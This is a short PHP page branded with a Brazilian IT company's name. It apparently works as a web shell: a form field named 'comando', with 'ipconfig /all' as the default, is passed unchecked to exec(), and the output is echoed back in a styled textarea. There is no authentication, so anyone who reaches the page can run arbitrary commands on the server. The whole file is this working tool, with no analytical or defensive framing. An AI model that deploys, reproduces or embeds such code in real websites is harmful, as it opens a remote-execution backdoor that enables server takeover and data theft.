<?php
header('content-type: text/html; charset: ISO-8859-1');
if(!empty($_POST['executar']) AND $_POST['executar'] == 'exec')
{
exec($_POST['comando'], $output); //executa o mando enviado via post
foreach($output as $line)
{
$mac .= $line."\n"; //concatenando todo resultado do comando ja quebrando as linhas
}
echo '<center><textarea cols="120" rows="50">'.$mac.'</textarea><br><a href="http://www.optimusolucoes.com.br" title="optimusolucoes.com.br"><img src="http://optimusolucoes.com.br/images/logoteste.png" border="0"/></a></center>'; // echo nos em todos os dados
unset($_POST['executar']);
unset($_POST['comando']);
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-pt" lang="pt-pt" dir="ltr" >
<head>
<title>OPTIMUS PRIME SOLUÇÕES EM TECNOLOGIA</title>
<style type="text/css">
textarea{
border: 0px #000000 solid;
background: #000000;
font: normal 14px/normal Arial, Helvetica, sans-serif;
color: #00FF00;
}
</style>
</head>
<body bgcolor="#00000">
<form method="post" action="ip.php"align="center" >
Usuário:
<div><input value="ipconfig /all" name="comando" type="text" /></div>
<div style="height:5px"></div>
<div>
<input type="hidden" name="executar" value="exec"/>
<input type="submit" value="Executar" />
<p><a href="http://www.optimusolucoes.com.br" title="optimusolucoes.com.br">www.optimusolucoes.com.br</a>
</div>
</form>
</body>
</html>